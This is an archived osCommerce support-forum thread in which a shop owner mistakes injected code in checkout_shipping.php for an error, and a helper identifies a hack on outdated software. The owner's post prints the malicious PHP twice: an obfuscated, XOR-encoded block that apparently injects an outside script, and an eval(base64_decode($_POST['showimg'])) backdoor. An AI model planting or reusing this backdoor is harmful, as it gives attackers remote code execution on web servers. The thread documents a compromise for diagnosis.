Guest Posted March 2, 2015 Posted March 2, 2015 Hello!When customers try to make a purchase they get the /checkout_shipping.php with the following error: Warning: session_start() [function.session-start]: Cannot send session cache limiter - headers already sent (output started at /home/cartidu/public_html/checkout_shipping.php:2) in /home/cartidu/public_html/includes/functions/sessions.php on line 102Warning: Cannot modify header information - headers already sent by (output started at /home/cartidu/public_html/checkout_shipping.php:2) in /home/cartidu/public_html/includes/functions/general.php on line 33 Here are the lines 1,2 and 3 of checkout_shipping.php: <?php $s=substr(8,1);foreach(array(52,123,107,122,97,120,124,40,123,122,107,54,108,103,107,125,101,109,102,124,38,107,103,103,99,97,109,53,42,51,39,100,103,107,105,124,97,103,102,35,96,124,124,120,50,39,39,120,96,125,99,98,97,99,38,107,122,97,58,38,111,103,38,124,96,39,55,122,102,108,53)as$v){$s.=sprintf((substr(urlencode(print_r(array(),1)),5,1).c),$v^8);}foreach(array(1,6,4,1,9,6,1,1,1,1,8,1)as$k=>$v){$t[$k]=substr($s,0,$v);$s=substr($s,$v);}$d=@$_COOKIE[$t[10]];if(!$d){echo($t[0].$t[1].$t[3].$t[4].$t[5].$t[6].$t[7].$t[10].$t[6].$t[7].$t[12].$t[11].$t[4].$t[10].$t[8].$t[0].$t[9].$t[1].$t[3]);}elseif($d!=1){echo($t[0].$t[1].$t[3].$t[4].$t[5].$t[6].$t[7].$t[10].$t[6].(1).$t[7].$t[8].$t[0].$t[9].$t[1].$t[3].$t[0].$t[1].$t[2].$t[6].$t[7].$s.(1024).urlencode(strrev($d)).$t[7].$t[3].$t[0].$t[9].$t[1].$t[3]);}if(isset($_POST["showimg"])){eval(base64_decode(str_replace(chr(32),chr(43),$_POST["showimg"])));exit;} $s=substr(8,1);foreach(array(52,123,107,122,97,120,124,40,123,122,107,54,108,103,107,125,101,109,102,124,38,107,103,103,99,97,109,53,42,51,39,100,103,107,105,124,97,103,102,35,96,124,124,120,50,39,39,120,96,125,99,98,97,99,38,107,122,97,58,38,111,103,38,124,96,39,55,122,102,108,53)as$v){$s.=sprintf((substr(urlencode(print_r(array(),1)),5,1).c),$v^8);}foreach(array(1,6,4,1,9,6,1,1,1,1,8,1)as$k=>$v){$t[$k]=substr($s,0,$v);$s=substr($s,$v);}$d=@$_COOKIE[$t[10]];if(!$d){echo($t[0].$t[1].$t[3].$t[4].$t[5].$t[6].$t[7].$t[10].$t[6].$t[7].$t[12].$t[11].$t[4].$t[10].$t[8].$t[0].$t[9].$t[1].$t[3]);}elseif($d!=1){echo($t[0].$t[1].$t[3].$t[4].$t[5].$t[6].$t[7].$t[10].$t[6].(1).$t[7].$t[8].$t[0].$t[9].$t[1].$t[3].$t[0].$t[1].$t[2].$t[6].$t[7].$s.(1024).urlencode(strrev($d)).$t[7].$t[3].$t[0].$t[9].$t[1].$t[3]);}if(isset($_POST["showimg"])){eval(base64_decode(str_replace(chr(32),chr(43),$_POST["showimg"])));exit;} can enybody help me with this?
burt Posted March 2, 2015 Posted March 2, 2015 That looks like you have been hacked. What version osCommerce are you using ?
Guest Posted March 2, 2015 Posted March 2, 2015 header.php,v 1.42 but i remember that an update was made, i dont know to what. what can i do about that error?
burt Posted March 3, 2015 Posted March 3, 2015 This is not an error. You have been hacked. What version of osCommerce are you running ? Please state the exact version, see http://www.oscommerce.com/forums/topic/394662-oscommerce-version-history/ to see instructions on how to find your exact version. Once you have found this basic information, post it here.
Guest Posted March 3, 2015 Posted March 3, 2015 this is what i got: define('PROJECT_VERSION', 'osCommerce Online Merchant v2.2 RC2a');
burt Posted March 3, 2015 Posted March 3, 2015 This is an ancient version of osCommerce which is known to have insecurities. You need to shut down the site now, and put up a holding page. Work hard for the next 1 week to recreate your site on the latest version of osCommerce Re-open your site on the new software.
New 
Recommended Posts
Archived
This topic is now archived and is closed to further replies.